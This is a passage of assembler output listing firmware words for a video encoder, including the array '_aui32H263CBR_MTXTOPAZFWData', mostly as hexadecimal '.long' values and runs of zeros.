0xa45dc038 .long 2893922352 ## 0xac7dc030 .long 2757607480 ## 0xa45dc038 .long 2893922352 ## 0xac7dc030 .long 2757607480 ## 0xa45dc038 .long 3221360002 ## 0xc0020d82 .long 4294183298 ## 0xfff40982 .long 3757873857 ## 0xdffc9ac1 .long 3657989182 ## 0xda087c3e .long 167946666 ## 0xa02a9aa .long 172150786 ## 0xa42d002 .long 1494005536 ## 0x590cb720 .long 3221359034 ## 0xc00209ba .long 2231765676 ## 0x85060aac .long 2720125448 ## 0xa221d208 .long 1085912384 ## 0x40b9b540 .long 2595160052 ## 0x9aaefff4 .long 1452586784 ## 0x5694b720 .long 236245297 ## 0xe14d131 .long 211079537 ## 0xc94d171 .long 219992369 ## 0xd1cd131 .long 2684475912 ## 0xa001da08 .long 236769649 ## 0xe1cd171 .long 3036710146 ## 0xb5008502 .long 3624419371 ## 0xd808402b .long 3221332291 ## 0xc001a143 .long 3657959558 ## 0xda080886 .long 3038814467 ## 0xb520a103 .long 3080669389 ## 0xb79f48cd .long 3082780526 ## 0xb7bf7f6e .long 2353037294 ## 0x8c407fee .long 3072367650 ## 0xb7209c22 .long 3078640780 ## 0xb780548c .long 2231517485 ## 0x8502412d .long 1094432064 ## 0x413bb540 .long 3045067268 ## 0xb5800a04 .long 2619490605 ## 0x9c22412d .long 3072370205 ## 0xb720a61d .long 3078641292 ## 0xb780568c .long 2660057645 ## 0x9e8d422d .long 1401731008 ## 0x538cb7c0 .long 168064708 ## 0xa0476c4 .long 1110291840 ## 0x422db580 .long 2435104768 ## 0x9124c000 .long 4061168898 ## 0xf2108502 .long 3657998643 ## 0xda08a133 .long 4061178453 ## 0xf210aa55 .long 3078660661 ## 0xb780a235 .long 1992578188 ## 0x76c4548c .long 4060651174 ## 0xf2089ea6 .long 3221856642 ## 0xc009a182 .long 3657994532 ## 0xda089124 .long 3074468182 ## 0xb740a956 .long 2231523724 ## 0x8502598c .long 2704528080 ## 0xa133d2d0 .long 2706100880 ## 0xa14bd290 .long 2857234952 ## 0xaa4df208 .long 2840064008 ## 0xa947f008 .long 2149708560 ## 0x8021f310 .long 3525574793 ## 0xd2240089 .long 4161296639 ## 0xf80858ff .long 4064846033 ## 0xf248a0d1 .long 4077955653 ## 0xf310aa45 .long 9011233 ## 0x898021 .long 1493160484 ## 0x58ffd224 .long 2697590792 ## 0xa0c9f808 .long 2697852936 ## 0xa0cdf808 .long 2832069192 ## 0xa8cdf248 .long 2158223904 ## 0x80a3e220 .long 219192907 ## 0xd109e4b .long 1510457472 ## 0x5a07c080 .long 59076808 ## 0x38570c8 .long 2697392136 ## 0xa0c6f008 .long 2455158784 ## 0x9256c000 .long 1493749926 ## 0x5908d0a6 .long 2149839376 ## 0x8023f210 .long 1511244288 ## 0x5a13c200 .long 2231791816 ## 0x850670c8 .long 2706100880 ## 0xa14bd290 .long 2429992960 ## 0x90d6c000 .long 2704528080 ## 0xa133d2d0 .long 2724590088 ## 0xa265f208 .long 2850484744 ## 0xa9e6f208 .long 218275411 ## 0xd029e53 .long 2611265556 ## 0x9ba4c014 .long 2856972816 ## 0xaa49f210 .long 4065359106 ## 0xf2507502 .long 3221332021 ## 0xc001a035 .long 3501298420 ## 0xd0b192f4 .long 3523742436 ## 0xd2080ae4 .long 1962977825 ## 0x7500aa21 .long 2449653761 ## 0x9202c001 .long 2856966672 ## 0xaa49da10 .long 1514201600 ## 0x5a40e200 .long 2455945216 ## 0x9262c000 .long 2841631312 ## 0xa95fda50 .long 1514521088 ## 0x5a45c200 .long 2149708560 ## 0x8021f310 .long 2848578064 ## 0xa9c9da10 .long 2724059728 ## 0xa25dda50 .long 2849954384 ## 0xa9deda50 .long 3222539522 ## 0xc0140d02 .long 3662715777 ## 0xda509b81 .long 3662717021 ## 0xda50a05d .long 1966123613 ## 0x7530aa5d .long 2459090944 ## 0x9292c000 .long 2857235016 ## 0xaa4df248 .long 1494012454 ## 0x590cd226 .long 2833641992 ## 0xa8e5f208 .long 2283926288 ## 0x8821f310 .long 1510982144 ## 0x5a0fc200 .long 3221254216 ## 0xc0007048 .long 3523776764 ## 0xd20890fc .long 436513313 ## 0x1a04aa21 .long 2720125448 ## 0xa221d208 .long 2855662160 ## 0xaa35f250 .long 2833641992 ## 0xa8e5f208 .long 3662710018 ## 0xda508502 .long 3525747039 ## 0xd226a15f .long 1950374152 ## 0x74405908 .long 2149708560 ## 0x8021f310 .long 2720657936 ## 0xa229f210 .long 2427895808 ## 0x90b6c000 .long 4061168898 ## 0xf2108502 .long 4060651819 ## 0xf208a12b .long 4061178457 ## 0xf210aa59 .long 3221399721 ## 0xc002a8a9 .long 3254807118 ## 0xc2006a4e .long 1883789855 ## 0x70485a1f .long 2426191872 ## 0x909cc000 .long 2720657936 ## 0xa229f210 .long 2833445448 ## 0xa8e2f248 .long 2829709840 ## 0xa8a9f210 .long 2860118536 ## 0xaa79f208 .long 3289554506 ## 0xc4129e4a .long 3490738244 ## 0xd0107044 .long 4061163778 ## 0xf2107102 .long 4061176361 ## 0xf210a229 .long 3670581793 ## 0xdac8a221 .long 1950787777 ## 0x7446a8c1 .long 2440347648 ## 0x9174c000 .long 148951249 ## 0x8e0d0d1 .long 1076475776 ## 0x4029b780 .long 3555793416 ## 0xd3f11a08 .long 3221236046 ## 0xc000294e .long 151687264 ## 0x90a9060 .long 2831872528 ## 0xa8caf210 .long 142767682 ## 0x8827642 .long 143839241 ## 0x892d009 .long 167933112 ## 0xa0274b8 .long 172150793 ## 0xa42d009 .long 183662664 ## 0xaf27848 .long 1143124773 ## 0x4422b325 .long 3221255746 ## 0xc0007642 .long 2662043892 ## 0x9eab90f4 .long 2594177012 ## 0x9a9ffff4 .long 2436939776 ## 0x9140c000 .long 240177297 ## 0xe50d091 .long 3536880906 ## 0xd2d0850a .long 2239668543 ## 0x857ea13f .long 2701382152 ## 0xa103d208 .long 2855391952 ## 0xaa31d2d0 .long 3221255426 ## 0xc0007502 .long 3501298020 ## 0xd0b19164 .long 3523742308 ## 0xd2080a64 .long 1950394497 ## 0x7440a881 .long 173330433 ## 0xa54d001 .long 718197729 ## 0x2aced3e1 .long 2856964752 ## 0xaa49d290 .long 3489756418 ## 0xd0017502 .long 3554740820 ## 0xd3e10a54 .long 3499174606 ## 0xd0912ace .long 3078622416 ## 0xb7800cd0 .long 1900560425 ## 0x71484029 .long 2431827968 ## 0x90f2c000 .long 2856178384 ## 0xaa3dd2d0 .long 3221254472 ## 0xc0007148 .long 42569832 ## 0x2899068 .long 2856442568 ## 0xaa41dac8 .long 1954353368 ## 0x747d10d8 .long 2436284416 ## 0x9136c000 .long 148951249 ## 0x8e0d0d1 .long 1076475776 ## 0x4029b780 .long 3221232136 ## 0xc0001a08 .long 1950650688 ## 0x74449140 .long 2436677632 ## 0x913cc000 .long 148951249 ## 0x8e0d0d1 .long 1076475776 ## 0x4029b780 .long 3555789320 ## 0xd3f10a08 .long 3499174606 ## 0xd0912ace .long 3078622416 ## 0xb7800cd0 .long 1900560425 ## 0x71484029 .long 2431827968 ## 0x90f2c000 .long 2856178384 ## 0xaa3dd2d0 .long 3221254472 ## 0xc0007148 .long 42569832 ## 0x2899068 .long 2730087120 ## 0xa2b9d2d0 .long 2730611208 ## 0xa2c1d208 .long 2428551177 ## 0x90c0c009 .long 1502394272 ## 0x598cb7a0 .long 2856186448 ## 0xaa3df250 .long 2838753808 ## 0xa933f210 .long 2830758416 ## 0xa8b9f210 .long 2837508618 ## 0xa920f20a .long 2847273488 ## 0xa9b5f210 .long 2846290440 ## 0xa9a6f208 .long 2309222928 ## 0x89a3f210 .long 2317480720 ## 0x8a21f310 .long 2881155664 ## 0xabbaf250 .long 4060613890 ## 0xf2080d02 .long 3222577697 ## 0xc014a221 .long 4065368743 ## 0xf2509aa7 .long 4060653911 ## 0xf208a957 .long 4060785185 ## 0xf20aaa21 .long 4077955404 ## 0xf310a94c .long 4060645409 ## 0xf2088821 .long 3254823098 ## 0xc200a8ba .long 4077935111 ## 0xf3105a07 .long 4064840225 ## 0xf2488a21 .long 142780705 ## 0x882a921 .long 1896009746 ## 0x7102d012 .long 134479880 ## 0x8040008 .long 3222427655 ## 0xc0125807 .long 2659348484 ## 0x9e827004 .long 1917109264 ## 0x7244c410 .long 4061164994 ## 0xf21075c2 .long 3221332138 ## 0xc001a0aa .long 3657994268 ## 0xda08901c .long 93301193 ## 0x58fa9c9 .long 3222539522 ## 0xc0140d02 .long 3501300353 ## 0xd0b19a81 .long 3523873382 ## 0xd20a0a66 .long 3759253760 ## 0xe011a900 .long 268603042 ## 0x10028ea2 .long 1073920512 ## 0x4002ba00 .long 3120562190 ## 0xba00000e .long 1948008450 ## 0x741c4002 .long 3003286838 ## 0xb3028536 .long 3657974904 ## 0xda084478 .long 4027689161 ## 0xf011a8c9 .long 4077947938 ## 0xf3108c22 .long 3492971041 ## 0xd0328221 .long 4061160386 ## 0xf21063c2 .long 4065372459 ## 0xf250a92b .long 3809520181 ## 0xe310aa35 .long 3254814895 ## 0xc20088af .long 1883789851 ## 0x70485a1b .long 2694967824 ## 0xa0a1f210 .long 1180218405 ## 0x4658b425 .long 2848643592 ## 0xa9cada08 .long 1573215680 ## 0x5dc55dc0 .long 4065330678 ## 0xf25005f6 .long 3657998770 ## 0xda08a1b2 .long 218278345 ## 0xd02a9c9 .long 2588983316 ## 0x9a50c014 .long 2856972816 ## 0xaa49f210 .long 4065359106 ## 0xf2507502 .long 3221266481 ## 0xc000a031 .long 3658518770 ## 0xda1090f2 .long 1962977865 ## 0x7500aa49 .long 2462236673 ## 0x92c2c001 .long 1494005536 ## 0x590cb720 .long 1093252992 ## 0x4129b780 .long 58946816 ## 0x3837500 .long 2470756353 ## 0x9344c001 .long 2854875720 ## 0xaa29f248 .long 3670570240 ## 0xdac87500 .long 3221268545 ## 0xc000a841 .long 4061172124 ## 0xf210919c .long 1611245985 ## 0x6009a9a1 .long 3517226625 ## 0xd1a49e81 .long 218257799 ## 0xd025987 .long 3222537622 ## 0xc0140596 .long 3670579755 ## 0xdac89a2b .long 2655692994 ## 0x9e4aa8c2 .long 277143552 ## 0x1084e000 .long 3004437024 ## 0xb3141220 .long 1963213868 ## 0x7504442c .long 2430255104 ## 0x90dac000 .long 2688670408 ## 0xa041dac8 .long 2470494208 ## 0x9340c000 .long 1891671627 ## 0x70c09e4b .long 2430386176 ## 0x90dcc000 .long 504680465 ## 0x1e14d011 .long 2449522688 ## 0x9200c000 .long 236245009 ## 0xe14d011 .long 2441134080 ## 0x9180c000 .long 2839796424 ## 0xa943dac8 .long 2856704712 ## 0xaa45dac8 .long 2149708560 ## 0x8021f310 .long 1494005728 ## 0x590cb7e0 .long 1510457856 ## 0x5a07c200 .long 2722224840 ## 0xa241dac8 .long 2859061768 ## 0xaa69d208 .long 3221255424 ## 0xc0007500 .long 3670577668 ## 0xdac89204 .long 1967041089 ## 0x753eaa41 .long 2427764736 ## 0x90b4c000 .long 3221259646 ## 0xc000857e .long 1962971328 ## 0x750090c0 .long 2426716160 ## 0x90a4c000 .long 3670574342 ## 0xdac88506 .long 4061176131 ## 0xf210a143 .long 1963108937 ## 0x7502aa49 .long 2431827968 ## 0x90f2c000 .long 2856966672 ## 0xaa49da10 .long 3221255424 ## 0xc0007500 .long 3523776994 ## 0xd20891e2 .long 1962977897 ## 0x7500aa69 .long 2453979136 ## 0x9244c000 .long 174117073 ## 0xa60d0d1 .long 2843922952 ## 0xa982d208 .long 2573598708 ## 0x9965fff4 .long 2436939776 ## 0x9140c000 .long 240177297 ## 0xe50d091 .long 3536880906 ## 0xd2d0850a .long 2239668543 ## 0x857ea13f .long 2701382152 ## 0xa103d208 .long 2855391952 ## 0xaa31d2d0 .long 3221255426 ## 0xc0007502 .long 3501298116 ## 0xd0b191c4 .long 3523742308 ## 0xd2080a64 .long 1950394497 ## 0x7440a881 .long 2430910464 ## 0x90e4c000 .long 2856442568 ## 0xaa41dac8 .long 3670542856 ## 0xdac80a08 .long 3503399489 ## 0xd0d1a241 .long 3523742304 ## 0xd2080a60 .long 3499206785 ## 0xd091a881 .long 142872144 ## 0x8840e50 .long 2697056776 ## 0xa0c1d208 .long 2827145736 ## 0xa882d208 .long 773772273 ## 0x2e1ed3f1 .long 687652878 ## 0x28fcc00e .long 3221254216 ## 0xc0007048 .long 3536884018 ## 0xd2d09132 .long 3555829950 ## 0xd3f1a8be .long 1883778590 ## 0x70482e1e .long 2424881152 ## 0x9088c000 .long 2697122312 ## 0xa0c2d208 .long 2837705232 ## 0xa923f210 .long 2831274504 ## 0xa8c1d208 .long 2150626064 ## 0x802ff310 .long 2696532688 ## 0xa0b9d2d0 .long 2720657936 ## 0xa229f210 .long 3509683458 ## 0xd1318502 .long 3509653072 ## 0xd1310e50 .long 4069526744 ## 0xf2900cd8 .long 3657998627 ## 0xda08a123 .long 3513884931 ## 0xd171a103 .long 3040874064 ## 0xb5400e50 .long 4069539899 ## 0xf290403b .long 3657998643 ## 0xda08a133 .long 3513884931 ## 0xd171a103 .long 3536850520 ## 0xd2d00e58 .long 3658000569 ## 0xda08a8b9 .long 4061176067 ## 0xf210a103 .long 4061176111 ## 0xf210a12f .long 3662717223 ## 0xda50a127 .long 3523780825 ## 0xd208a0d9 .long 3658525249 ## 0xda10aa41 .long 3080692301 ## 0xb79fa24d .long 3082780270 ## 0xb7bf7e6e .long 3084877550 ## 0xb7df7eee .long 3086974830 ## 0xb7ff7f6e .long 3221389294 ## 0xc0027fee .long 2619509760 ## 0x9c228c00 .long 3078661645 ## 0xb780a60d .long 4060632716 ## 0xf208568c .long 3074468111 ## 0xb740a90f .long 3074445572 ## 0xb7405104 .long 3793769356 ## 0xe220538c .long 3072360879 ## 0xb72081af .long 4060632212 ## 0xf2085494 .long 4031291790 ## 0xf048a18e .long 3760236737 ## 0xe020a8c1 .long 3074458407 ## 0xb7408327 .long 2656061149 ## 0x9e5046dd .long 3792728066 ## 0xe2107002 .long 159547567 ## 0x98280af .long 109249289 ## 0x6830309 .long 3040871045 ## 0xb5400285 .long 3221246228 ## 0xc0005114 .long 4060647768 ## 0xf2089158 .long 3525749293 ## 0xd226aa2d .long 3792722180 ## 0xe2105904 .long 3221260707 ## 0xc00089a3 .long 3658519008 ## 0xda1091e0 .long 4060654121 ## 0xf208aa29 .long 168339629 ## 0xa08a8ad .long 1631768627 ## 0x6142d033 .long 4061164213 ## 0xf21072b5 .long 3006564397 ## 0xb334882d .long 25773110 ## 0x1894436 .long 3221255360 ## 0xc00074c0 .long 3072365052 ## 0xb72091fc .long 3497089292 ## 0xd071590c .long 3254782526 ## 0xc2000a3e .long 2231785879 ## 0x85065997 .long 1102689600 ## 0x41b9b540 .long 1085125984 ## 0x40adb560 .long 2436939776 ## 0x9140c000 .long 1494005632 ## 0x590cb780 .long 3523773698 ## 0xd2088502 .long 2231542031 ## 0x8502a10f .long 2701652488 ## 0xa107f208 .long 1435809728 ## 0x5594b7c0 .long 2846546440 ## 0xa9aada08 .long 2840588880 ## 0xa94ff250 .long 2846480904 ## 0xa9a9da08 .long 1573477824 ## 0x5dc95dc0 .long 2175787552 ## 0x81afe220 .long 3222539522 ## 0xc0140d02 .long 3670579475 ## 0xdac89913 .long 4061175841 ## 0xf210a021 .long 3503401121 ## 0xd0d1a8a1 .long 3490187728 ## 0xd00809d0 .long 4060654177 ## 0xf208aa61 .long 1950656838 ## 0x7444a946 .long 2720125448 ## 0xa221d208 .long 2705519112 ## 0xa142f208 .long 2477047808 ## 0x93a4c000 .long 2854875664 ## 0xaa29f210 .long 3221255426 ## 0xc0007502 .long 3080753732 ## 0xb7a09244 .long 4064827788 ## 0xf248598c .long 160868949 ## 0x996aa55 .long 2846552648 ## 0xa9aaf248 .long 3254783234 ## 0xc2000d02 .long 4064827915 ## 0xf2485a0b .long 3222577753 ## 0xc014a259 .long 4064844015 ## 0xf24898ef .long 4061175849 ## 0xf210a029 .long 4064848477 ## 0xf248aa5d .long 3221267017 ## 0xc000a249 .long 4065366880 ## 0xf2509360 .long 4064848449 ## 0xf248aa41 .long 4061176409 ## 0xf210a259 .long 3662719198 ## 0xda50a8de .long 3624446271 ## 0xd808a93f .long 3074468449 ## 0xb740aa61 .long 4064827788 ## 0xf248598c .long 3658522830 ## 0xda10a0ce .long 4077955241 ## 0xf310a8a9 .long 4031283233 ## 0xf0488021 .long 3662717258 ## 0xda50a14a .long 142910013 ## 0x884a23d .long 2695485968 ## 0xa0a9da10 .long 2129573791 ## 0x7eeeb79f .long 2137962431 ## 0x7f6eb7bf .long 2146351071 ## 0x7feeb7df .long 2619509856 ## 0x9c228c60 .long 2216732189 ## 0x8420a61d .long 1452062592 ## 0x568cb780 .long 2828399112 ## 0xa895f208 .long 411344185 ## 0x18849d39 .long 2694181384 ## 0xa095f208 .long 2831863832 ## 0xa8cad018 .long 1418508064 ## 0x548cb720 .long 1984071042 ## 0x76428582 .long 3076562329 ## 0xb7609d99 .long 3221244065 ## 0xc00048a1 .long 4060647748 ## 0xf2089144 .long 4060651907 ## 0xf208a183 .long 3498090894 ## 0xd080a18e .long 3221266630 ## 0xc000a0c6 .long 3070267712 ## 0xb7009140 .long 3078641292 ## 0xb780568c .long 3498066476 ## 0xd080422c .long 3045106119 ## 0xb580a1c7 .long 3072344876 ## 0xb720432c .long 3078641292 ## 0xb780568c .long 3084931980 ## 0xb7e0538c .long 3084933524 ## 0xb7e05994 .long 4060627373 ## 0xf20841ad .long 4195395981 ## 0xfa10a98d .long 306097009 ## 0x123eab71 .long 3525574793 ## 0xd2240089 .long 4195375359 ## 0xfa1058ff .long 3758140137 ## 0xe000aae9 .long 123863906 ## 0x7620362 .long 258134019 ## 0xf62d003 .long 47374336 ## 0x2d2e000 .long 3489859282 ## 0xd00306d2 .long 3533835986 ## 0xd2a20ed2 .long 3263192588 ## 0xc2805e0c .long 3491780853 ## 0xd02058f5 .long 3263181080 ## 0xc2803118 .long 3758119180 ## 0xe000590c .long 355078442 ## 0x152a112a .long 488820739 ## 0x1d22d003 .long 1576321280 ## 0x5df4c100 .long 2647367256 ## 0x9dcb9e58 .long 3238043323 ## 0xc1009ebb .long 814242317 ## 0x30885a0d .long 1611184005 ## 0x6008b785 .long 4061175144 ## 0xf2109d68 .long 239975 ## 0x3a967 .long 3500438786 ## 0xd0a47502 .long 4077934719 ## 0xf310587f .long 3006499239 ## 0xb33389a7 .long 3042921508 ## 0xb55f4c24 .long 4195385188 ## 0xfa107f64 .long 4195394417 ## 0xfa10a371 .long 4195394281 ## 0xfa10a2e9 .long 4061175917 ## 0xf210a06d .long 4292125669 ## 0xffd4a3e5 .long 3076496156 ## 0xb75f9b1c .long 4026564452 ## 0xf0007f64 .long 1963240001 ## 0x7504aa41 .long 2453979136 ## 0x9244c000 .long 1401730848 ## 0x538cb720 .long 2849435712 ## 0xa9d6f040 .long 1118549856 ## 0x42abb760 .long 4061138178 ## 0xf2100d02 .long 428122594 ## 0x1984a1e2 .long 2554642452 ## 0x9844c014 .long 1452062592 ## 0x568cb780 .long 2686317128 ## 0xa01df248 .long 1452062464 ## 0x568cb700 .long 3040904450 ## 0xb5408502 .long 3080667580 ## 0xb79f41bc .long 3082780142 ## 0xb7bf7dee .long 3084877422 ## 0xb7df7e6e .long 3086974702 ## 0xb7ff7eee .long 3221389166 ## 0xc0027f6e .long 2619509792 ## 0x9c228c20 .long 1402255136 ## 0x5394b720 .long 2826360848 ## 0xa876d810 .long 2842685456 ## 0xa96ff010 .long 1121170688 ## 0x42d3b500 .long 2842554384 ## 0xa96df010 .long 1419032384 ## 0x5494b740 .long 1104000896 ## 0x41cdb780 .long 1502394208 ## 0x598cb760 .long 1104000320 ## 0x41cdb540 .long 2831800336 ## 0xa8c9d810 .long 2283926288 ## 0x8821f310 .long 486723603 ## 0x1d02d013 .long 2841964554 ## 0xa964f00a .long 2292441616 ## 0x88a3e210 .long 4031799875 ## 0xf0506243 .long 4077955437 ## 0xf310a96d .long 4027089441 ## 0xf0088221 .long 3040911973 ## 0xb540a265 .long 4027598285 ## 0xf01045cd .long 3045108337 ## 0xb580aa71 .long 4027597389 ## 0xf010424d .long 3038816501 ## 0xb520a8f5 .long 2619491021 ## 0x9c2242cd .long 1958789128 ## 0x74c0c008 .long 2656214616 ## 0x9e529e58 .long 2432483328 ## 0x90fcc000 .long 1891684354 ## 0x70c0d002 .long 1374886420 ## 0x51f31a14 .long 3221573651 ## 0xc0055013 .long 3221255168 ## 0xc0007400 .long 3489829116 ## 0xd00290fc .long 441479168 ## 0x1a507000 .long 19419155 ## 0x1285013 .long 1627699008 ## 0x6104b740 .long 1636611968 ## 0x618cb780 .long 1493488038 ## 0x5904d1a6 .long 3225460269 ## 0xc0409e2d .long 3358632165 ## 0xc830a8e5 .long 1883548237 ## 0x7044aa4d .long 3491586057 ## 0xd01d6009 .long 3491369492 ## 0xd01a1214 .long 3007336467 ## 0xb3405013 .long 304236730 ## 0x122248ba .long 2619494416 ## 0x9c225010 .long 1925234690 ## 0x72c0c002 .long 470470673 ## 0x1c0ad011 .long 39970 ## 0x9c22 .long 2277689353 ## 0x87c2c809 .long 203468896 ## 0xc20b060 .long 2277689353 ## 0x87c2c809 .long 174108768 ## 0xa60b060 .long 2277689353 ## 0x87c2c809 .long 163623008 ## 0x9c0b060 .globl _aui32H263CBR_MTXTOPAZFWData ## @aui32H263CBR_MTXTOPAZFWData .p2align 4 _aui32H263CBR_MTXTOPAZFWData: .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 2156921008 ## 0x809000b0 .long 2156921244 ## 0x8090019c .long 2189970532 ## 0x82884c64 .long 2189969756 ## 0x8288495c .long 2189969812 ## 0x82884994 .long 2189969854 ## 0x828849be .long 2189969872 ## 0x828849d0 .long 2189969932 ## 0x82884a0c .long 2189969980 ## 0x82884a3c .long 2189970028 ## 0x82884a6c .long 2189970068 ## 0x82884a94 .long 2189970132 ## 0x82884ad4 .long 2189970148 ## 0x82884ae4 .long 2189970164 ## 0x82884af4 .long 2189970172 ## 0x82884afc .long 2189970180 ## 0x82884b04 .long 2189970192 ## 0x82884b10 .long 2189970984 ## 0x82884e28 .long 2189970936 ## 0x82884df8 .long 2189970648 ## 0x82884cd8 .long 2189970240 ## 0x82884b40 .long 2189970728 ## 0x82884d28 .long 2189970800 ## 0x82884d70 .long 2189970804 ## 0x82884d74 .long 2189970796 ## 0x82884d6c .long 2189970872 ## 0x82884db8 .long 2189971656 ## 0x828850c8 .long 2189971423 ## 0x82884fdf .long 2189971424 ## 0x82884fe0 .long 2189971391 ## 0x82884fbf .long 2189971392 ## 0x82884fc0 .long 2189971456 ## 0x82885000 .long 2189971588 ## 0x82885084 .long 2189971144 ## 0x82884ec8 .long 2189971236 ## 0x82884f24 .long 2189971328 ## 0x82884f80 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 2156922588 ## 0x809006dc .long 2156927976 ## 0x80901be8 .long 2156930288 ## 0x809024f0 .long 2156922592 ## 0x809006e0 .long 2156936020 ## 0x80903b54 .long 2156937336 ## 0x80904078 .long 2156922668 ## 0x8090072c .long 0 ## 0x0 .long 2156928424 ## 0x80901da8 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 2156922588 ## 0x809006dc .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 